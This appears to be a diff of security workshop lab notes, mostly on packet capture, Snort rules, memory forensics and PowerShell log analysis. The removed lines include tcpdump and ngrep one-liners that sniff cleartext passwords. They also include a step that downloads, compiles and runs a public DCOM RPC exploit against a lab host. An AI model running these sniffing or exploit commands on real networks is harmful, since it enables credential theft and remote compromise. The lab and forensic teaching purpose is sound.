620	-	tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A \| egrep -i 'pass=\|pwd=\|log=\|login=\|user=\|username=\|pw=\|passw=\|passwd=\|password=\|pass:\|user:\|username:\|password:\|login:\|pass \|user ' --color=auto --line-buffered -B20
620	+	Supported attacks:
621	-	------------------------------------------------------------------------
621	+	1. SQL Injection
622		2. Local File Inclusion
623		3. Remote File Inclusion
624		4. Cross-Site Scripting
625	-	#########
625	+
626	-	# NGrep #
626	+
627	-	#########
627	+
628		wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py
629	-	Install ngrep on Ubuntu
629	+
630	-	---------------------------Type This-----------------------------------
630	+	The usage for scan_log.py is simple. You feed it an apache log file.
631	-	$ sudo apt-get install ngrep
631	+
632	-	------------------------------------------------------------------------
632	+	cat scan_log.py \| less (use your up/down arrow keys to look through the file)
633
634	-	Search network traffic for string "User-Agent: "
634	+
635	-	---------------------------Type This-----------------------------------
635	+
636	-	$ sudo ngrep -d eth0 "User-Agent: " tcp and port 80
636	+
637	-	------------------------------------------------------------------------
637	+
638	-	In the above command :
638	+
639	-	a) tcp and port 80 - is the bpf filter (Berkeley Packet Filter) , that sniffs only TCP packet with port number 80
639	+	# Log Analysis with Powershell #
640	-	b) The d option specifies the interface to sniff. eth0 in this case.
640	+
641	-	c) "User-Agent: " is the string to search for. All packets that have that string are displayed.
641	+
642		VM for these labs
643	-	2. Search network packets for GET or POST requests :
643	+	-----------------
644	-	---------------------------Type This-----------------------------------
644	+	https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
645	-	$ sudo ngrep -l -q -d eth0 "^GET \|^POST " tcp and port 80
645	+	username: workshop
646	-	------------------------------------------------------------------------
646	+	password: password
647	-	The l option makes the output buffered and the q option is for quiet ( Be quiet; don't output any information other than packet headers and their payloads (if relevant) ).
647	+
648
649	-	3. ngrep without any options would simply capture all packets.
649	+	You can do the updates in the Win7 VM (yes, it is a lot of updates).
650	-	---------------------------Type This-----------------------------------
650	+
651	-	$ sudo ngrep
651	+	You'll need to create directory in the Win7 VM called "c:\ps"
652	-	------------------------------------------------------------------------
652	+
653		#####################
654	-	Reference:
654	+	# Powershell Basics #
655	-	https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
655	+	#####################
656	-	---------------------------Type This-----------------------------------
656	+
657	-	$ sudo ngrep -d eth0 -n 3
657	+	PowerShell is Microsoft’s new scripting language that has been built in since the release Vista.
658
659	-	$ sudo ngrep -d any port 25
659	+	PowerShell file extension end in .ps1 .
660	-	------------------------------------------------------------------------
660	+
661		An important note is that you cannot double click on a PowerShell script to execute it.
662	-	This will let you monitor all activity crossing source or destination port 25
662	+
663	-	(SMTP).
663	+	To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
664	-	---------------------------Type This-----------------------------------
664	+
665	-	$ sudo ngrep -wi -d wlan0 'user\|pass' port 6667
665	+	dir
666		cd
667	-	$ sudo ngrep -wi -d any 'user\|pass' port 21
667	+
668	-	------------------------------------------------------------------------
668	+	cd c:\
669
670
671		To obtain a list of cmdlets, use the Get-Command cmdlet
672
673		Get-Command
674
675	-	# PCAP Analysis with tshark #
675	+
676
677	-	---------------------------Type This-----------------------------------
677	+	You can use the Get-Alias cmdlet to see a full list of aliased commands.
678	-	sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
678	+
679		Get-Alias
680
681	-	tshark -r suspicious-time.pcap \| grep 'NB.20\>' \| sed -e 's/<[^>]>//g' \| awk '{print $3,$4,$9}' \| sort -u
681	+
682
683		Don't worry you won't blow up your machine with Powershell
684	-	tshark -r suspicious-time.pcap \| grep 'NB.1e\>' \| sed -e 's/<[^>]>//g' \| awk '{print $3,$4,$9}' \| sort -u
684	+	Get-Process \| stop-process What will this command do?
685		Get-Process \| stop-process -whatif
686
687	-	tshark -r suspicious-time.pcap arp \| grep has \| awk '{print $3," -> ",$9}' \| tr -d '?'
687	+
688		To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
689
690	-	tshark -r suspicious-time.pcap -Tfields -e "eth.src" \| sort \| uniq
690	+	Get-Help Get-Command
691
692		Get-Help Get-Service –online
693	-	tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" \| uniq
693	+
694		Get-Service -Name TermService, Spooler
695	-	tshark -r suspicious-time.pcap -Tfields -e "eth.src" \| sort \|uniq
695	+
696		Get-Service –N BITS
697	-	tshark -r suspicious-time.pcap -qz ip_hosts,tree
697	+
698		Start-Transcript
699	-	tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" \| uniq
699	+
700		PowerShell variables begin with the $ symbol. First lets create a variable
701	-	tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
701	+
702		$serv = Get-Service –N Spooler
703
704	-	whois rapidshare.com.eyu32.ru
704	+	To see the value of a variable you can just call it in the terminal.
705
706	-	whois sploitme.com.cn
706	+	$serv
707
708		$serv.gettype().fullname
709	-	tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
709	+
710
711	-	tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' \| grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
711	+	Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
712
713	-	tshark -r suspicious-time.pcap -qz http_req,tree
713	+	$serv \| Get-Member
714
715	-	tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
715	+	Get-Member -InputObject $serv
716
717	-	tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' \| grep -v -e '\/image' -e '.css' -e '.ico' \| grep 10.0.3.15 \| sed -e 's/\?[^cse].*/\?\.\.\./g'
717	+
718
719
720
721	-	######################################
721	+	Let’s use a method and a property with our object.
722	-	# PCAP Analysis with forensicPCAP.py #
722	+
723	-	######################################
723	+	$serv.Status
724	-	---------------------------Type This-----------------------------------
724	+	$serv.Stop()
725	-	cd ~/Desktop/suspiciouspcap/
725	+	$serv.Refresh()
726		$serv.Status
727	-	wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
727	+	$serv.Start()
728		$serv.Refresh()
729	-	sudo pip install cmd2==0.7.9
729	+	$serv.Status
730
731
732	-	python forensicPCAP.py suspicious-time.pcap
732	+
733	-	------------------------------------------------------------------------
733	+
734		Methods can return properties and properties can have sub properties. You can chain them together by appending them to the first call.
735
736	-	---------------------------Type This-----------------------------------
736	+
737	-	ForPCAP >>> help
737	+
738	-	------------------------------------------------------------------------
738	+
739		# Simple Event Log Analysis #
740	-	Prints stats about PCAP
740	+
741	-	---------------------------Type This-----------------------------------
741	+
742	-	ForPCAP >>> stat
742	+	Step 1: Dump the event logs
743	-	------------------------------------------------------------------------
743	+	---------------------------
744		The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
745	-	Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
745	+
746	-	---------------------------Type This-----------------------------------
746	+	To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
747	-	ForPCAP >>> dns
747	+	If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
748
749	-	ForPCAP >>> show
749	+	Get-EventLog -LogName application \| Export-Clixml Applog.xml
750	-	------------------------------------------------------------------------
750	+
751		type .\Applog.xml
752	-	Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
752	+
753	-	---------------------------Type This-----------------------------------
753	+	$logs = "system","application","security"
754	-	ForPCAP >>> dstports
754	+
755		The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
756	-	ForPCAP >>> show
756	+
757	-	---------------------------Type This-----------------------------------
757	+	$logs \| % { get-eventlog -LogName $_ \| Export-Clixml "$_.xml" }
758
759	-	Prints the number of ip source and store them.
759	+
760	-	---------------------------Type This-----------------------------------
760	+
761	-	ForPCAP >>> ipsrc
761	+	Step 2: Import the event log of interest
762		----------------------------------------
763	-	ForPCAP >>> show
763	+	To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
764	-	------------------------------------------------------------------------
764	+	Store the results in a variable.
765		Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
766	-	Prints the number of web's requests and store them
766	+
767	-	ForPCAP >>> web
767	+	The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
768
769	-	ForPCAP >>> show
769	+	$seclog = Import-Clixml security.xml
770	-	------------------------------------------------------------------------
770	+
771		$seclog \| select -Last 5
772
773	-	Prints the number of mail's requests and store them
773	+
774	-	---------------------------Type This-----------------------------------
774	+	Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
775	-	ForPCAP >>> mail
775	+
776		Get-EventLog Application -After (Get-Date).AddDays(-1)
777	-	ForPCAP >>> show
777	+
778	-	------------------------------------------------------------------------
778	+	You can use '-after' and '-before' to filter date ranges
779
780		One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
781		By default, an ordinary user does not have permission to read the security log.
782
783
784		Step 3: Drill into a specific entry
785	-	# Understanding Snort rules #
785	+
786		To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
787	-	Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
787	+
788
789	-	Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
789	+	$seclog \| select -first 1 \| fl *
790
791	-	Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
791	+	The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
792
793	-	Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
793	+
794		($seclog \| select -first 1).message
795	-	Field 5: Traffic Direction (->)
795	+
796		(($seclog \| select -first 1).message).gettype()
797	-	Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
797	+
798
799	-	Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
799	+
800		In the *nix world you often want a count of something (wc -l).
801	-	Field 8: MSG - what is actually displayed on the analysts machine
801	+	How often is the SeSecurityPrivilege privilege mentioned in the message property?
802		To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
803
804	-	Let's look at 2 simple rules
804	+	$seclog \| ? { $_.message -match 'SeSecurityPrivilege'} \| measure
805	-	----------------------------------------------------------------------------------
805	+
806	-	alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator \
806	+	If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
807	-	bind attempt”; flow:to_server,established; content:”\|05\|”; distance:0; within:1; \
807	+
808	-	content:”\|0b\|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”\|A0 01 00 \
808	+
809	-	00 00 00 00 00 C0 00 00 00 00 00 00 46\|”; distance:29; within:16; \
809	+	$seclog \| ? { $_.message -match 'SeSecurityPrivilege'} \| group eventid
810	-	reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
810	+
811		Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
812	-	alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind \
812	+	Use the count property to determine the total number of entries in the event log.
813	-	attempt”; flow:to_server,established; content:”\|FF\|SMB\|25\|”; nocase; offset:4; \
813	+
814	-	depth:5; content:”\|26 00\|”; distance:56; within:2; content:”\|5c \
814	+	$seclog.Count
815	-	00\|P\|00\|I\|00\|P\|00\|E\|00 5c 00\|”; nocase; distance:5; within:12; content:”\|05\|”; \
815	+
816	-	distance:0; within:1; content:”\|0b\|”; distance:1; within:1; \
816	+
817	-	byte_test:1,&,1,0,relative; content:”\|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
817	+
818	-	46\|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
818	+
819	-	sid:2193; rev:1;)
819	+
820	-	----------------------------------------------------------------------------------
820	+
821		############################
822		# Simple Log File Analysis #
823		############################
824	-	From your Linux machine ping your Windows machine
824	+
825	-	---------------------------Type This-----------------------------------
825	+
826	-	ping 192.168.150.1
826	+	You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
827	-	-----------------------------------------------------------------------
827	+
828
829		mkdir c:\ps
830	-	Start wireshark and let's create some simple filters:
830	+	cd c:\ps
831		(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
832	-	Filter 1:
832	+
833	-	---------------------------Type This-----------------------------------
833	+
834	-	ip.addr==192.168.150.1
834	+
835	-	-----------------------------------------------------------------------
835	+
836
837	-	Filter 2:
837	+
838	-	---------------------------Type This-----------------------------------
838	+
839	-	ip.addr==192.168.150.1 && icmp
839	+
840	-	-----------------------------------------------------------------------
840	+	###############################################
841		# Intrusion Analysis Using Windows PowerShell #
842		###############################################
843	-	Filter 3:
843	+
844	-	---------------------------Type This-----------------------------------
844	+	Download sample file http://pastebin.com/raw.php?i=ysnhXxTV into the c:\ps directory
845	-	ip.addr==192.168.150.1 && !(tcp.port==22)
845	+
846	-	-----------------------------------------------------------------------
846	+
847	-	Now stop your capture and restart it (make sure you keep the filter)
847	+
848
849
850		(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
851
852	-	Back to your Linux machine:
852	+	Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
853	-	[ CTRL-C ] - to stop your ping
853	+
854	-	---------------------------Type This-----------------------------------
854	+
855	-	wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
855	+
856
857		The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
858	-	gcc -o exploit oc192-dcom.c
858	+
859		Select-String 192.168.208.63 .\CiscoLogFileExamples.txt \| select line
860	-	./exploit
860	+
861
862
863	-	./exploit -d 192.168.150.1 -t 0
863	+
864	-	-----------------------------------------------------------------------
864	+	To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
865
866		Select-String 192.168.208.63 .\CiscoLogFileExamples.txt \| select line \| Measure-Object
867
868	-	Now go back to WireShark and stop the capture.
868	+
869
870		To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
871
872		Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select -ExpandProperty value \| Sort-Object -Unique \| Measure-Object
873	-	###################
873	+
874	-	# Memory Analysis #
874	+
875	-	###################
875	+
876	-	---------------------------Type This-----------------------------------
876	+	Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
877	-	cd ~/Desktop/
877	+
878		Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select -ExpandProperty value \| Sort-Object -Unique
879	-	sudo apt-get install -y foremost tcpxtract
879	+
880
881	-	wget https://s3.amazonaws.com/infosecaddictsfiles/hn_forensics.vmem
881	+	In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
882		This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
883	-	git clone https://github.com/volatilityfoundation/volatility.git
883	+
884		Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select value \| group value \| sort count -des
885	-	cd volatility
885	+
886	-	sudo pip install distorm3
886	+
887	-	sudo python setup.py install
887	+
888	-	python vol.py -h
888	+
889	-	python vol.py pslist -f ~/Desktop/hn_forensics.vmem
889	+	This will get the setting for logs in the windows firewall which should be enabled in GPO policy for analysis.
890	-	python vol.py connscan -f ~/Desktop/hn_forensics.vmem
890	+	The command shows that the Firewall log is at:
891	-	mkdir dump/
891	+	%systemroot%\system32\LogFiles\Firewall\pfirewall.log, in order to open the file PowerShell will need to be run with administrative privileges.
892	-	mkdir -p output/pdf/
892	+
893	-	python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 888 -D dump/
893	+
894	-	python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 1752 -D dump/
894	+	First step is to get the above command into a variable using script logic.
895	-	*Takes a few min*
895	+	Thankfully PowerShell has a built-in integrated scripting environment, PowerShell.ise.
896	-	strings 1752.dmp \| grep "^http://" \| sort \| uniq
896	+
897	-	strings 1752.dmp \| grep "Ahttps://" \| uniq -u
897	+	netsh advfirewall show allprofiles \| Select-String FileName \| select -ExpandProperty line \| Select-String “%systemroot%.+\.log" \| select -ExpandProperty matches \| select -ExpandProperty value \| sort –uniq
898	-	cd ..
898	+
899	-	foremost -i ~/Desktop/volatility/dump/1752.dmp -t pdf -o output/pdf/
899	+
900	-	cd ~/Desktop/volatility/output/pdf/
900	+	##############################################
901	-	cat audit.txt
901	+	# Parsing Log files using windows PowerShell #
902	-	cd pdf
902	+	##############################################
903
904	-	grep -i javascript *.pdf
904	+	Download the sample IIS log http://pastebin.com/LBn64cyA
905
906
907		(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
908	-	cd ~/Desktop/volatility/output/pdf/
908	+
909	-	wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
909	+	Get-Content ".\*log" \| ? { ($_ \| Select-String "WebDAV")}
910	-	unzip pdf-parser_V0_6_4.zip
910	+
911	-	python pdf-parser.py -s javascript --raw pdf/00601560.pdf
911	+
912	-	python pdf-parser.py --object 11 00600328.pdf
912	+
913	-	python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
913	+	The above command would give us all the WebDAV requests.
914
915	-	cat malicious.js
915	+	To filter this to a particular user name, use the below command:
916	-	-----------------------------------------------------------------------
916	+
917		Get-Content ".\*log" \| ? { ($_ \| Select-String "WebDAV") -and ($_ \| Select-String "OPTIONS")}
918
919
920
921	-	***Sorry - no time to cover javascript de-obfuscation today***
921	+	Some more options that will be more commonly required :
922
923		For Outlook Web Access : Replace WebDAV with OWA
924
925		For EAS : Replace WebDAV with Microsoft-server-activesync
926	-	---------------------------Type This-----------------------------------
926	+
927	-	cd ~/Desktop/volatility
927	+	For ECP : Replace WebDAV with ECP
928	-	mkdir files2/
928	+
929	-	python vol.py -f ~/Desktop/hn_forensics.vmem dumpfiles -D files2/
929	+
930	-	python vol.py hivescan -f ~/Desktop/hn_forensics.vmem
930	+
931	-	python vol.py printkey -o 0xe1526748 -f ~/Desktop/hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
931	+	To find out the count of the EWS request we can go ahead and run the below command
932	-	-----------------------------------------------------------------------
932	+
933		(Get-Content ".\*log" \| ? { ($_ \| Select-String "WebDAV") -and ($_ \| Select-String "Useralias")}).count
934
935	-	######################
935	+
936	-	----------- ############### # Intro to Reversing # ############### -----------
936	+
937	-	######################
937	+
938	-	Lab walk-through documents are in the zip file along with the executables that need to be reversed:
938	+
939	-	https://s3.amazonaws.com/infosecaddictsfiles/Lena151.zip
939	+
940
941
942
943		Explain to me how this script works.

Public Pastes

Untitled
HTML | 15 min ago | 0.32 KB
Untitled
C# | 21 min ago | 9.58 KB
🤑 G2A.com Free Gift Card Guide May 2024 FIX 💰
GetText | 28 min ago | 0.38 KB
EasyButton Library rev_02
Arduino | 35 min ago | 1.90 KB
Button Handler rev_01
Arduino | 37 min ago | 2.14 KB
batstats.go
Go | 37 min ago | 2.37 KB
batstats.rb
Ruby | 47 min ago | 2.46 KB
batstats.js
JavaScript | 51 min ago | 1.71 KB